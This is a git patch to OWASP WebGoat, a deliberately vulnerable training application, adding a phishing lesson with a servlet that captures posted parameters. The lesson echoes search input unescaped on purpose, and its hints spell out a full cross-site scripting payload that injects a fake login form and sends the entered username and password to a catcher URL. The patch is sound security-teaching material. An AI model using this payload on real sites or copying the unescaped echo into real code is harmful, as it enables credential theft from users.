From 34fca4321691463071226b8ab2c88d8864829f69 Mon Sep 17 00:00:00 2001 From: mayhew64 Date: Mon, 19 Mar 2007 17:47:37 +0000 Subject: [PATCH] New Phishing Lesson git-svn-id: http://webgoat.googlecode.com/svn/trunk@119 4033779f-a91e-0410-96ef-6bf7bf53c507 --- .../JavaSource/org/owasp/webgoat/Catcher.java | 116 +++++++ .../org/owasp/webgoat/LessonSource.java | 112 +++---- .../org/owasp/webgoat/lessons/Phishing.java | 282 ++++++++++++++++++ .../webgoat/lessons/admin/ViewDatabase.java | 2 +- .../project/WebContent/WEB-INF/web-unix.xml | 20 +- .../WebContent/WEB-INF/web-windows.xml | 17 +- .../main/project/WebContent/WEB-INF/web.xml | 17 +- 7 files changed, 486 insertions(+), 80 deletions(-) create mode 100644 webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java create mode 100644 webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java new file mode 100644 index 000000000..c23bd5152 --- /dev/null +++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java @@ -0,0 +1,116 @@ +package org.owasp.webgoat; + +import java.io.IOException; +import java.util.Enumeration; + +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; + +import org.owasp.webgoat.lessons.AbstractLesson; +import org.owasp.webgoat.session.Course; +import org.owasp.webgoat.session.WebSession; + +/******************************************************************************* + * + * + * This file is part of WebGoat, an Open Web Application Security Project + * utility. For details, please see http://www.owasp.org/ + * + * Copyright (c) 2002 - 2007 Bruce Mayhew + * + * This program is free software; you can redistribute it and/or modify it under + * the terms of the GNU General Public License as published by the Free Software + * Foundation; either version 2 of the License, or (at your option) any later + * version. + * + * This program is distributed in the hope that it will be useful, but WITHOUT + * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS + * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more + * details. + * + * You should have received a copy of the GNU General Public License along with + * this program; if not, write to the Free Software Foundation, Inc., 59 Temple + * Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Getting Source ============== + * + * Source for this application is maintained at code.google.com, a repository + * for free software projects. + * + * For details, please see http://code.google.com/p/webgoat/ + * + * @author Bruce Mayhew WebGoat + * @created March 13, 2007 + */ +public class Catcher extends HammerHead +{ + + /** + * Description of the Field + */ + public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE"; + + public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE"; + + public static final String PROPERTY = "PROPERTY"; + + public static final String EMPTY_STRING = ""; + + + /** + * Description of the Method + * + * @param request Description of the Parameter + * @param response Description of the Parameter + * @exception IOException Description of the Exception + * @exception ServletException Description of the Exception + */ + public void doPost(HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException + { + try + { + //System.out.println( "Entering doPost: " ); + //System.out.println( " - request " + request); + //System.out.println( " - principle: " + request.getUserPrincipal() ); + //setCacheHeaders(response, 0); + WebSession session = (WebSession) request.getSession(true) + .getAttribute(WebSession.SESSION); + session.update(request, response, this.getServletName()); // FIXME: Too much in this call. + + int scr = session.getCurrentScreen(); + Course course = session.getCourse(); + AbstractLesson lesson = course.getLesson(session, scr, + AbstractLesson.USER_ROLE); + + log(request, lesson.getClass().getName() + " | " + + session.getParser().toString()); + + String property = new String(session.getParser().getStringParameter( + PROPERTY, EMPTY_STRING)); + + // if the PROPERTY parameter is available - write all the parameters to the + // property file. No other control parameters are supported at this time. + if ( !property.equals(EMPTY_STRING)) + { + Enumeration e = session.getParser().getParameterNames(); + + while (e.hasMoreElements()) + { + String name = (String) e.nextElement(); + String value= session.getParser().getParameterValues(name)[0]; + lesson.getLessonTracker(session).getLessonProperties().setProperty( + name, value); + } + } + lesson.getLessonTracker(session).store(session, lesson); + + } + catch (Throwable t) + { + t.printStackTrace(); + log("ERROR: " + t); + } + } +} diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java index 9f8ff6470..79acbe650 100644 --- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java +++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java @@ -67,80 +67,50 @@ public class LessonSource extends HammerHead public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { - String source = null; - - try - { - //System.out.println( "Entering doPost: " ); - //System.out.println( " - request " + request); - //System.out.println( " - principle: " + request.getUserPrincipal() ); - //setCacheHeaders(response, 0); - WebSession session = (WebSession) request.getSession(true) - .getAttribute(WebSession.SESSION); - session.update(request, response, this.getServletName()); // FIXME: Too much in this call. - - // Get the Java source of the lesson. FIXME: Not needed - source = getSource(session); - - int scr = session.getCurrentScreen(); - Course course = session.getCourse(); - AbstractLesson lesson = course.getLesson(session, scr, - AbstractLesson.USER_ROLE); - lesson.getLessonTracker(session).setViewedSource(true); - } - catch (Throwable t) - { - t.printStackTrace(); - log("ERROR: " + t); - } - finally - { - try - { - this.writeSource(source, response); - } - catch (Throwable thr) - { - thr.printStackTrace(); - log(request, "Could not write error screen: " - + thr.getMessage()); - } - //System.out.println( "Leaving doPost: " ); - - } + String source = null; + + try + { + //System.out.println( "Entering doPost: " ); + //System.out.println( " - request " + request); + //System.out.println( " - principle: " + request.getUserPrincipal() ); + //setCacheHeaders(response, 0); + WebSession session = (WebSession) request.getSession(true) + .getAttribute(WebSession.SESSION); + session.update(request, response, this.getServletName()); // FIXME: Too much in this call. + + // Get the Java source of the lesson. FIXME: Not needed + source = getSource(session); + + int scr = session.getCurrentScreen(); + Course course = session.getCourse(); + AbstractLesson lesson = course.getLesson(session, scr, + AbstractLesson.USER_ROLE); + lesson.getLessonTracker(session).setViewedSource(true); + } + catch (Throwable t) + { + t.printStackTrace(); + log("ERROR: " + t); + } + finally + { + try + { + this.writeSource(source, response); + } + catch (Throwable thr) + { + thr.printStackTrace(); + log(request, "Could not write error screen: " + + thr.getMessage()); + } + //System.out.println( "Leaving doPost: " ); + + } } - protected WebSession updateSession_DELETEME(HttpServletRequest request, - HttpServletResponse response, ServletContext context) - { - HttpSession hs; - hs = request.getSession(true); - - //System.out.println( "Entering Session_id: " + hs.getId() ); - // dumpSession( hs ); - - // Make a temporary session to avoid the concurreny issue - // in WebSession - WebSession session = new WebSession(this, context); - - WebSession realSession = null; - Object o = hs.getAttribute(WebSession.SESSION); - - if ((o != null) && o instanceof WebSession) - { - realSession = (WebSession) o; - } - session.setCurrentScreen(realSession.getCurrentScreen()); - session.setCourse(realSession.getCourse()); - session.setRequest(request); - - // to authenticate - //System.out.println( "Leaving Session_id: " + hs.getId() ); - //dumpSession( hs ); - return (session); - } - /** * Description of the Method diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java new file mode 100644 index 000000000..5077ddd0d --- /dev/null +++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java @@ -0,0 +1,282 @@ +package org.owasp.webgoat.lessons; + +import java.util.ArrayList; +import java.util.List; + +import org.apache.ecs.Element; +import org.apache.ecs.ElementContainer; +import org.apache.ecs.StringElement; +import org.apache.ecs.html.B; +import org.apache.ecs.html.BR; +import org.apache.ecs.html.Comment; +import org.apache.ecs.html.H1; +import org.apache.ecs.html.HR; +import org.apache.ecs.html.Input; +import org.apache.ecs.html.TD; +import org.apache.ecs.html.TH; +import org.apache.ecs.html.TR; +import org.apache.ecs.html.Table; +import org.owasp.webgoat.Catcher; +import org.owasp.webgoat.session.ECSFactory; +import org.owasp.webgoat.session.WebSession; + +/******************************************************************************* + * + * + * This file is part of WebGoat, an Open Web Application Security Project + * utility. For details, please see http://www.owasp.org/ + * + * Copyright (c) 2002 - 2007 Bruce Mayhew + * + * This program is free software; you can redistribute it and/or modify it under + * the terms of the GNU General Public License as published by the Free Software + * Foundation; either version 2 of the License, or (at your option) any later + * version. + * + * This program is distributed in the hope that it will be useful, but WITHOUT + * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS + * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more + * details. + * + * You should have received a copy of the GNU General Public License along with + * this program; if not, write to the Free Software Foundation, Inc., 59 Temple + * Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Getting Source ============== + * + * Source for this application is maintained at code.google.com, a repository + * for free software projects. + * + * For details, please see http://code.google.com/p/webgoat/ + * + * @author Bruce Mayhew WebGoat + * @created March 13, 2007 + */ +public class Phishing extends LessonAdapter +{ + + /** + * Description of the Field + */ + protected final static String SEARCH = "Username"; + private String searchText; + + + /** + * Description of the Method + * + * @param s Description of the Parameter + * @return Description of the Return Value + */ + private boolean postedCredentials(WebSession s) + { + String postedToCookieCatcher = getLessonTracker(s).getLessonProperties() + .getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); + + // + return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); + // + } + + + /** + * Description of the Method + * + * @param s Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + try + { + searchText = s.getParser().getRawParameter(SEARCH,""); + // + // + + ec.addElement(makeSearch(s)); + if (postedCredentials(s)) + { + makeSuccess(s); + } + } + catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + } + + return (ec); + } + + + protected Element makeSearch(WebSession s) + { + ElementContainer ec = new ElementContainer(); + + ec.addElement(new H1().addElement("WebGoat Search ")); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) + .setAlign("center"); + + TR tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + if (s.isColor()) + { + t.setBorder(1); + } + + tr = new TR(); + tr + .addElement(new TH() + .addElement( + "This facility will search the WebGoat source.") + .setColSpan(2).setAlign("center")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + + TR row1 = new TR(); + row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right")); + + Input input1 = new Input(Input.TEXT, SEARCH, searchText); + row1.addElement(new TD(input1).setAlign("left")); + t.addElement(row1); + + Element b = ECSFactory.makeButton("Search"); + t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center")); + ec.addElement(t); + + if (!searchText.equals("")) + { + ec.addElement(new BR()); + ec.addElement(new HR()); + ec.addElement(new BR()); + ec.addElement(new StringElement("Results for: " + searchText)); + ec.addElement(new Comment("Search results")); + ec.addElement(new BR()); + ec.addElement(new BR()); + ec.addElement(new B(new StringElement("No results were found."))); + ec.addElement(new Comment("End of Search results")); + } + + return (ec); + } + + + /** + * Gets the hints attribute of the CluesScreen object + * + * @return The hints value + */ + protected List getHints() + { + List hints = new ArrayList(); + hints + .add("Try adding HTML to the search field to create a fake authentication form.
" + + "Try to make the form look official."); + hints.add("Try:
" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br></form><br><br><HR>"); + hints.add("Add functionality that can post a request, a button might work

" + + "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" + + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); + hints.add("Try:
" + + "<input type="submit" name="login" " + + "value="login">"+ + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + hints.add("Make the button perform an action on submit,
" + + "adding an onclick=\"hack()\" might work
"+ + "Don't forget to add the hack() javascript function" + + "

Solution for this hint:

" + + "password<form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + hints.add("You need to create the hack() function. This function will pull the credentials from the " + + "webpage and post them to the WebGoat catcher servlet.
" + + "
Some useful code snippets:
    " + + "
  • doucument.forms[0].user.value - will access the user field" + + "
  • XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + + "
  • javascript string concatentation uses a \"+\"
" + + "

Solution for this hint():

" + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script>"); + hints.add("Complete solution for this lesson:

" + + "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." + + "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " + + "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" + + "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" + + "</script><form><br><br><HR><H3>This feature requires account login:</H2" + + "><br><br>Enter Username:<br><input type="text" id="user" " + + "name="user"><br>Enter Password:<br><input type="password" " + + "name = "pass"><br><input type="submit" name="login" " + + "value="login" onclick="hack()"></form><br><br><HR>"); + /** + * password


This feature requires account login:



Enter Username:

Enter Password:



FeedbackAddress - <A HREF=mailto:webgoat@g2-inc.com>webgoat@g2-inc.com</A> + <A HREF=mailto:WebGoat@g2-inc.com>WebGoat@g2-inc.com</A> @@ -174,6 +174,14 @@ org.owasp.webgoat.LessonSource + + CookieCatcher + + This servlet catches any posts and marks the appropriate lesson property. + + org.owasp.webgoat.CookieCatcher + + conf /lessons/ConfManagement/config.jsp @@ -195,8 +203,7 @@ It is also legal to define more than one mapping for the same servlet, if you wish to. --> - - + AxisServlet /servlet/AxisServlet @@ -235,11 +242,16 @@ /source + + CookieCatcher + /catcher + + conf /conf - +